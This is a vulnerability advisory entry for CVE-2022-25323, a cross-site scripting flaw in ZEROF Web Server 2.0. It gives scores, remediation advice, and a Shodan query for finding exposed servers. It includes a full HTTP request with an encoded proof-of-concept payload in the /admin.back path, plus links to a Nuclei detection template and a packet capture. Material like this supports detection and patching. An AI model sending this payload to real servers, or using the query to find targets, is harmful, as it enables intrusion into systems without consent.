| Title | ZEROF Web Server 2.0 - Cross-Site Scripting |
|---|---|
| Author | pikpikcu |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. |
| Remediation | Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in ZEROF Web Server 2.0. |
| CVSS Score | 6.1 |
| EPSS Score | 0.04955 |
| CVE ID | CVE-2022-25323 |
| CWE ID | CWE-79 |
| Shodan Query | cpe:"cpe:2.3:a:google:web_server" |
| Tags | cve cve2022 xss zerof vuln |
ZEROF Web Server 2.0 allows /admin.back cross-site scripting.
GET /admin.back%3Cimg%20src=x%20onerror=alert%28document.domain%29%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14092.77.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.107 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-25323.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-25323.pcap
N/AN/A